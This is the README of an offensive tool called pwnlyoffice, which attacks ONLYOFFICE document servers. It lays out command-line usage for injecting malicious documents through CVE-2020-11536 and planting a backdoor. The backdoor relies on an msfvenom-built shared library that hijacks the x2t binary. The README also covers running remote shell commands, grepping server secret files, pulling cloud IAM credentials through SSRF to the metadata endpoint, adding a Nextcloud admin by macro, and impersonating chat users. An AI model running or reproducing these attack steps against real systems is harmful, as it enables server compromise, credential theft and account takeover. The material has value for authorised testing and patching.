Exploit ONLYOFFICE Implementations
pwnlyoffice has a number of sub-commands to carry out actions against vulnerable instances of OnlyOffice. The main ones are:
- dl: Connect to the ONLYOFFICE document server and request that it downloads a provided URL. This can be used to test an instances to see if it has an unauthenticated / weak websocket. A random document id is created and this sub-command can be used to inject a malicious document into the document server (CVE-2020-11536)
- macro: If a pre-existing document id is known, this will inject the given JavaScript file into it as a macro. Two example exploits for NextCloud are included in
/macros, plus a basic PoC alert box. - chat: If a pre-existing document id is known, this allows you to connect to the in-editor chat function and pretend to be any user id of your choice.
- backdoor: Generate a malicious document which exploits CVE-2020-11536 to write a backdoor on the server.
- shell: Run commands against a server which has been compromised with the backdoor.
- enum: Attempt to guess valid document ids by providing a file containing a list of potential ids. The script will try each one to find a valid pre-existing document.
./pwnlyoffice.py -u https://theonlyofficesiteurl -D https://yoursite/uniquepath dlAny hits to /uniquepath means that the server meets the conditions for being able to have a malicious document injected into it:
- The authentication is either absent or uses the default JWT signing key
- The server is able to reach out to the Internet
./pwnlyoffice.py -u https://theonlyofficesiteurl backdoorThis generates backdoor.docx. Host this on a web server which is visible to the document server.
When loaded in ONLYOFFICE, this will write a number of files into /var/www/onlyoffice/documentserver/server/FileConverter/bin using CVE-2020-11536.
proxy.sh- written tox2t.shand will proxy through any commands for x2t in order to provide arbitrary RCEhijack.so- generated usingmsfvenom -a x64 -p linux/x64/exec CMD="cp bin/x2t bin/x2t.new; mv bin/x2t.sh bin/x2t; chmod u+x bin/x2t" -f elf-so -o hijack.so. This is written to the server aslibpthread.soin order to be loaded higher up theldsearch and execute a command which switches out the legitx2tbinary for a script which proxies it.x2t- this is the legitx2t, written tox2t.oldbecause in case anything goes wrong, that file will be there to restorex2t
To restore a borked server back to pre-pwned state in case anything went wrong with this, libpthread.so should not be in FileConverter/bin - delete that. x2t should be the legit x2t iELF binary and not a bash script. There shouldn't be any .sh files in that folder.
./pwnlyoffice.py -u https://theonlyofficesiteurl -D https://yoursite/backdoor.docx dl./pwnlyoffice.py -u https://theonlyofficesiteurl shellGet the document cache folder location:
grep -A 2 storage /etc/onlyoffice/documentserver/*linux.json | grep folderPathGet server secret strings (do we need them at this point?)
grep -i secret /etc/onlyoffice/documentserver/*./pwnlyoffice.py -u https://theonlyofficesiteurl sqlGet a list of valid document ids with SELECT DISTINCT id FROM task_result
./pwnlyoffice.py -u https://theonlyofficesiteurl -D http://169.254.169.254/latest/meta-data/iam/security-credentials dlThis macro adds an admin user into Nextcloud. The document id is 1234 and has to be known by the attacker. These vary depending on what the underlying document management system is.
./pwnlyoffice.py -d 1234 -u https://theonlyofficesiteurl macro macros/nextcloud_addadmin.jsMasquerading as a user called "Bob", connected to document id "1234"
./pwnlyoffice.py -d 1234 -u https://theonlyofficesiteurl -U Bob chat